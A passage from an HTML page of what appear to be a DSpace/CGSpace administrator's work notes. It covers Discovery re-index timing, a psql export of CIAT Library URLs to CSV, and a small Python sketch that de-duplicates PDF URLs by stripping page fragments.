< li > dspace index-discovery -b< / li >
< li > dspace-statistics-api index< / li >
< / ul >
< / li >
< li > With CMS the Discovery Index took:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > real 379m19.245s
< / span > < / span > < span style = "display:flex;" > < span > user 267m17.704s
< / span > < / span > < span style = "display:flex;" > < span > sys 4m2.937s
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > Leroy from CIAT said that the CIAT Library server has security issues, so access to it was limited to internal traffic
< ul >
< li > I extracted a list of URLs from CGSpace to send him:< / li >
< / ul >
< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
< / span > < / span > < span style = "display:flex;" > < span > COPY 4552
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I did some checks and cleanups in OpenRefine because there are some values with “#page” etc
< ul >
< li > Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs< / li >
< li > I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books< / li >
< / ul >
< / li >
< / ul >
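< p > The cleanup above was done in OpenRefine. As an illustration of the same idea, dropping “#page”-style fragments and then counting unique PDF URLs can be sketched in Python. The sample URLs and the host < code > ciat-library.example.org< / code > are hypothetical, as is the helper name < code > unique_pdf_urls< / code > and the exact < code > #page=N< / code > fragment form. In practice the input would be the < code > text_value< / code > column of the exported CSV.< / p >

```python
from urllib.parse import urldefrag


def unique_pdf_urls(urls):
    """Strip fragments such as '#page=12' and return the sorted unique URLs."""
    return sorted({urldefrag(url.strip()).url for url in urls if url.strip()})


# Hypothetical values: several metadata entries pointing at the same PDF.
sample_urls = [
    "http://ciat-library.example.org/book1.pdf#page=10",
    "http://ciat-library.example.org/book1.pdf#page=42",
    "http://ciat-library.example.org/book1.pdf",
    "https://ciat-library.example.org/report2.pdf",
]

unique = unique_pdf_urls(sample_urls)
print(f"{len(sample_urls)} values, {len(unique)} unique PDFs")
```

< p > The gap between the two counts is the number of metadata values that share a PDF with another item, which is where the chapter or page-range cases would show up.< / p >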
< / article >
< / div > <!-- /.blog-main -->
< aside class = "col-sm-3 ml-auto blog-sidebar" >
< section class = "sidebar-module" >
< h4 > Recent Posts< / h4 >
< ol class = "list-unstyled" >
< li > < a href = "/cgspace-notes/2023-03/" > March, 2023< / a > < / li >
< li > < a href = "/cgspace-notes/2023-02/" > February, 2023< / a > < / li >
< li > < a href = "/cgspace-notes/2023-01/" > January, 2023< / a > < / li >
< li > < a href = "/cgspace-notes/2022-12/" > December, 2022< / a > < / li >
< li > < a href = "/cgspace-notes/2022-11/" > November, 2022< / a > < / li >
< / ol >
< / section >
< section class = "sidebar-module" >
< h4 > Links< / h4 >
< ol class = "list-unstyled" >
< li > < a href = "https://cgspace.cgiar.org" > CGSpace< / a > < / li >
< li > < a href = "https://dspacetest.cgiar.org" > DSpace Test< / a > < / li >
< li > < a href = "https://github.com/ilri/DSpace" > CGSpace @ GitHub< / a > < / li >
< / ol >
< / section >
< / aside >
< / div > <!-- /.row -->
< / div > <!-- /.container -->
< footer class = "blog-footer" >
< p dir = "auto" >
Blog template created by < a href = "https://twitter.com/mdo" > @mdo< / a > , ported to Hugo by < a href = 'https://twitter.com/mralanorth' > @mralanorth< / a > .
< / p >
< p >
< a href = "#" > Back to top< / a >
< / p >
< / footer >
< / body >
< / html >